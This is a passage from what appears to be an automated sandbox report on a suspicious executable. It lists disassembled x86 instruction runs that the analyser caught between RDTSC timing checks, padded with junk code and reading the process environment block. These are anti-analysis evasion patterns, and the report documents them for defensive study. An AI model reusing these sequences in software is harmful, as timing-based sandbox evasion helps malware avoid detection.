795E647Eh 0x00000067 popad 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0266 second address: 6EB0275 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF7D4C1B3ABh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0275 second address: 6EB02EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007FF7D4C1B432h 0x0000000e mov dword ptr [esp], edi 0x00000011 jmp 00007FF7D4C1B430h 0x00000016 call dword ptr [74E50B60h] 0x0000001c mov eax, 750BE5E0h 0x00000021 ret 0x00000022 pushad 0x00000023 mov bx, ax 0x00000026 popad 0x00000027 push 00000044h 0x00000029 pushad 0x0000002a mov esi, 447F3931h 0x0000002f pushfd 0x00000030 jmp 00007FF7D4C1B42Eh 0x00000035 and si, C108h 0x0000003a jmp 00007FF7D4C1B42Bh 0x0000003f popfd 0x00000040 popad 0x00000041 pop edi 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007FF7D4C1B430h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB02EC second address: 6EB02F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB02F2 second address: 6EB0326 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B42Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FF7D4C1B430h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF7D4C1B42Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0326 second address: 6EB033E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B3ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ah, bh 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB033E second address: 6EB0344 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0344 second address: 6EB036A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B3B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 movsx ebx, cx 0x00000013 push ecx 0x00000014 pop edx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB036A second address: 6EB03DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B431h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000030h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FF7D4C1B433h 0x00000018 jmp 00007FF7D4C1B433h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FF7D4C1B438h 0x00000024 adc cx, A1A8h 0x00000029 jmp 00007FF7D4C1B42Bh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB03DB second address: 6EB0430 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF7D4C1B3AFh 0x00000009 or ch, FFFFFFEEh 0x0000000c jmp 00007FF7D4C1B3B9h 0x00000011 popfd 0x00000012 call 00007FF7D4C1B3B0h 0x00000017 pop esi 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push dword ptr [eax+18h] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FF7D4C1B3ACh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0430 second address: 6EB0442 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF7D4C1B42Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB04BA second address: 6EB0576 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B3B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FF842B6A57Dh 0x0000000f jmp 00007FF7D4C1B3B6h 0x00000014 sub eax, eax 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FF7D4C1B3B7h 0x0000001d and cx, 953Eh 0x00000022 jmp 00007FF7D4C1B3B9h 0x00000027 popfd 0x00000028 mov bh, al 0x0000002a popad 0x0000002b mov dword ptr [esi], edi 0x0000002d jmp 00007FF7D4C1B3B3h 0x00000032 mov dword ptr [esi+04h], eax 0x00000035 jmp 00007FF7D4C1B3B6h 0x0000003a mov dword ptr [esi+08h], eax 0x0000003d jmp 00007FF7D4C1B3B0h 0x00000042 mov dword ptr [esi+0Ch], eax 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 mov eax, edx 0x0000004a pushad 0x0000004b popad 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0576 second address: 6EB0631 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B434h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+4Ch] 0x0000000c jmp 00007FF7D4C1B430h 0x00000011 mov dword ptr [esi+10h], eax 0x00000014 jmp 00007FF7D4C1B430h 0x00000019 mov eax, dword ptr [ebx+50h] 0x0000001c jmp 00007FF7D4C1B430h 0x00000021 mov dword ptr [esi+14h], eax 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FF7D4C1B42Eh 0x0000002b adc eax, 27FF72E8h 0x00000031 jmp 00007FF7D4C1B42Bh 0x00000036 popfd 0x00000037 popad 0x00000038 mov eax, dword ptr [ebx+54h] 0x0000003b jmp 00007FF7D4C1B432h 0x00000040 mov dword ptr [esi+18h], eax 0x00000043 jmp 00007FF7D4C1B430h 0x00000048 mov eax, dword ptr [ebx+58h] 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007FF7D4C1B437h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0631 second address: 6EB06A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B3B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+1Ch], eax 0x0000000c jmp 00007FF7D4C1B3AEh 0x00000011 mov eax, dword ptr [ebx+5Ch] 0x00000014 jmp 00007FF7D4C1B3B0h 0x00000019 mov dword ptr [esi+20h], eax 0x0000001c pushad 0x0000001d push ecx 0x0000001e pushfd 0x0000001f jmp 00007FF7D4C1B3ADh 0x00000024 sub eax, 11A00BD6h 0x0000002a jmp 00007FF7D4C1B3B1h 0x0000002f popfd 0x00000030 pop eax 0x00000031 popad 0x00000032 mov eax, dword ptr [ebx+60h] 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB06A8 second address: 6EB06AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB06AC second address: 6EB06B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB06B2 second address: 6EB06C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF7D4C1B42Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB06C3 second address: 6EB0719 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B3B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+24h], eax 0x0000000e pushad 0x0000000f jmp 00007FF7D4C1B3ACh 0x00000014 pushfd 0x00000015 jmp 00007FF7D4C1B3B2h 0x0000001a adc esi, 46EEBEB8h 0x00000020 jmp 00007FF7D4C1B3ABh 0x00000025 popfd 0x00000026 popad 0x00000027 mov eax, dword ptr [ebx+64h] 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0719 second address: 6EB071F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB071F second address: 6EB075C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B3AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+28h], eax 0x0000000c jmp 00007FF7D4C1B3B0h 0x00000011 mov eax, dword ptr [ebx+68h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF7D4C1B3B7h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB075C second address: 6EB0862 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF7D4C1B42Fh 0x00000009 and ax, 6B3Eh 0x0000000e jmp 00007FF7D4C1B439h 0x00000013 popfd 0x00000014 push ecx 0x00000015 pop edi 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esi+2Ch], eax 0x0000001c pushad 0x0000001d mov eax, 1AF6777Fh 0x00000022 jmp 00007FF7D4C1B434h 0x00000027 popad 0x00000028 mov ax, word ptr [ebx+6Ch] 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007FF7D4C1B42Eh 0x00000033 jmp 00007FF7D4C1B435h 0x00000038 popfd 0x00000039 pushfd 0x0000003a jmp 00007FF7D4C1B430h 0x0000003f and cx, 6CF8h 0x00000044 jmp 00007FF7D4C1B42Bh 0x00000049 popfd 0x0000004a popad 0x0000004b mov word ptr [esi+30h], ax 0x0000004f jmp 00007FF7D4C1B436h 0x00000054 mov ax, word ptr [ebx+00000088h] 0x0000005b jmp 00007FF7D4C1B430h 0x00000060 mov word ptr [esi+32h], ax 0x00000064 jmp 00007FF7D4C1B430h 0x00000069 mov eax, dword ptr [ebx+0000008Ch] 0x0000006f push eax 0x00000070 push edx 0x00000071 jmp 00007FF7D4C1B437h 0x00000076 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0862 second address: 6EB0868 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0868 second address: 6EB087B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+34h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push esi 0x00000011 pop edi 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB087B second address: 6EB08E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF7D4C1B3B1h 0x00000009 add ch, FFFFFFB6h 0x0000000c jmp 00007FF7D4C1B3B1h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov eax, dword ptr [ebx+18h] 0x00000018 pushad 0x00000019 call 00007FF7D4C1B3B8h 0x0000001e jmp 00007FF7D4C1B3B2h 0x00000023 pop esi 0x00000024 mov dh, B0h 0x00000026 popad 0x00000027 mov dword ptr [esi+38h], eax 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d mov edi, eax 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB08E2 second address: 6EB0932 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 2B966681h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FF7D4C1B42Eh 0x0000000f add ecx, 5C6C5598h 0x00000015 jmp 00007FF7D4C1B42Bh 0x0000001a popfd 0x0000001b popad 0x0000001c mov eax, dword ptr [ebx+1Ch] 0x0000001f jmp 00007FF7D4C1B436h 0x00000024 mov dword ptr [esi+3Ch], eax 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a mov dx, 5610h 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0932 second address: 6EB0937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0937 second address: 6EB093D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB093D second address: 6EB096C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+20h] 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop eax 0x0000000e mov edi, 798F1496h 0x00000013 popad 0x00000014 mov dword ptr [esi+40h], eax 0x00000017 jmp 00007FF7D4C1B3ADh 0x0000001c lea eax, dword ptr [ebx+00000080h] 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 mov ah, dl 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB096C second address: 6EB0970 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0A65 second address: 6EB0A77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF7D4C1B3AEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0A77 second address: 6EB0AD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B42Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test edi, edi 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FF7D4C1B434h 0x00000014 add ax, BEE8h 0x00000019 jmp 00007FF7D4C1B42Bh 0x0000001e popfd 0x0000001f popad 0x00000020 js 00007FF842B6A037h 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 pushfd 0x0000002a jmp 00007FF7D4C1B42Dh 0x0000002f jmp 00007FF7D4C1B42Bh 0x00000034 popfd 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0AD5 second address: 6EB0B70 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF7D4C1B3B8h 0x00000008 add eax, 763993A8h 0x0000000e jmp 00007FF7D4C1B3ABh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov eax, dword ptr [ebp-0Ch] 0x0000001a pushad 0x0000001b mov cl, 91h 0x0000001d pushad 0x0000001e mov dl, DCh 0x00000020 mov eax, 6DDAB98Fh 0x00000025 popad 0x00000026 popad 0x00000027 mov dword ptr [esi+04h], eax 0x0000002a pushad 0x0000002b mov bx, si 0x0000002e mov bx, ax 0x00000031 popad 0x00000032 lea eax, dword ptr [ebx+78h] 0x00000035 jmp 00007FF7D4C1B3B6h 0x0000003a push 00000001h 0x0000003c jmp 00007FF7D4C1B3B0h 0x00000041 nop 0x00000042 jmp 00007FF7D4C1B3B0h 0x00000047 push eax 0x00000048 jmp 00007FF7D4C1B3ABh 0x0000004d nop 0x0000004e pushad 0x0000004f movzx eax, dx 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0B70 second address: 6EB0BA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 lea eax, dword ptr [ebp-08h] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov bx, ax 0x0000000f pushfd 0x00000010 jmp 00007FF7D4C1B42Eh 0x00000015 sbb si, 8058h 0x0000001a jmp 00007FF7D4C1B42Bh 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0BA0 second address: 6EB0BD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B3B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov eax, 58964093h 0x00000010 movzx eax, di 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov si, dx 0x0000001b mov dx, BC7Eh 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0BD4 second address: 6EB0BE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF7D4C1B42Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0C7F second address: 6EB0CDF instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF7D4C1B3B4h 0x00000008 adc ax, B8F8h 0x0000000d jmp 00007FF7D4C1B3ABh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov eax, dword ptr [ebp-04h] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FF7D4C1B3ABh 0x00000022 add ecx, 38F80CBEh 0x00000028 jmp 00007FF7D4C1B3B9h 0x0000002d popfd 0x0000002e mov edx, ecx 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0CDF second address: 6EB0CFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF7D4C1B438h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0CFB second address: 6EB0D0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0D0C second address: 6EB0D10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0D10 second address: 6EB0D14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0D14 second address: 6EB0D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0D1A second address: 6EB0D35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B3ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+70h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ecx, ebx 0x00000011 mov cx, dx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0D35 second address: 6EB0D81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B438h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000001h 0x0000000b jmp 00007FF7D4C1B430h 0x00000010 nop 0x00000011 pushad 0x00000012 jmp 00007FF7D4C1B42Eh 0x00000017 mov dx, si 0x0000001a popad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov bh, al 0x00000021 movsx ebx, ax 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0D81 second address: 6EB0E01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B3B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FF7D4C1B3B4h 0x00000011 jmp 00007FF7D4C1B3B5h 0x00000016 popfd 0x00000017 mov si, 7E37h 0x0000001b popad 0x0000001c lea eax, dword ptr [ebp-18h] 0x0000001f pushad 0x00000020 mov ax, FD2Fh 0x00000024 push eax 0x00000025 push edx 0x00000026 pushfd 0x00000027 jmp 00007FF7D4C1B3B2h 0x0000002c jmp 00007FF7D4C1B3B5h 0x00000031 popfd 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0E01 second address: 6EB0E24 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jmp 00007FF7D4C1B42Ah 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF7D4C1B42Eh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0E24 second address: 6EB0E56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007FF7D4C1B3ADh 0x0000000b add al, 00000056h 0x0000000e jmp 00007FF7D4C1B3B1h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0E56 second address: 6EB0E69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B42Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0E69 second address: 6EB0E81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF7D4C1B3B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0E81 second address: 6EB0E85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0EB0 second address: 6EB0EB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0EB4 second address: 6EB0EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0EBA second address: 6EB0EFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B3ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b jmp 00007FF7D4C1B3B0h 0x00000010 test edi, edi 0x00000012 pushad 0x00000013 mov esi, 3D18DF2Dh 0x00000018 mov bx, si 0x0000001b popad 0x0000001c js 00007FF842B69B6Dh 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FF7D4C1B3ABh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0EFB second address: 6EB0F21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0F21 second address: 6EB0F25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0F25 second address: 6EB0F38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B42Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0F38 second address: 6EB0F3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0F3E second address: 6EB0F68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B42Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF7D4C1B435h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0F68 second address: 6EB0FC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B3B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c jmp 00007FF7D4C1B3AEh 0x00000011 mov edx, 74E806ECh 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007FF7D4C1B3ADh 0x0000001e pushfd 0x0000001f jmp 00007FF7D4C1B3B0h 0x00000024 and cx, DFA8h 0x00000029 jmp 00007FF7D4C1B3ABh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0FC6 second address: 6EB1010 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007FF7D4C1B42Bh 0x0000000b or ah, FFFFFFEEh 0x0000000e jmp 00007FF7D4C1B439h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 sub eax, eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c call 00007FF7D4C1B433h 0x00000021 pop ecx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB1010 second address: 6EB1033 instructions: 0x00000000 rdtsc 0x00000002 call 00007FF7D4C1B3B9h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c mov ax, dx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB1033 second address: 6EB1066 instructions: 0x00000000 rdtsc 0x00000002 mov edx, 1EB9C85Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a lock cmpxchg dword ptr [edx], ecx 0x0000000e jmp 00007FF7D4C1B435h 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF7D4C1B42Dh 0x0000001b rdtsc
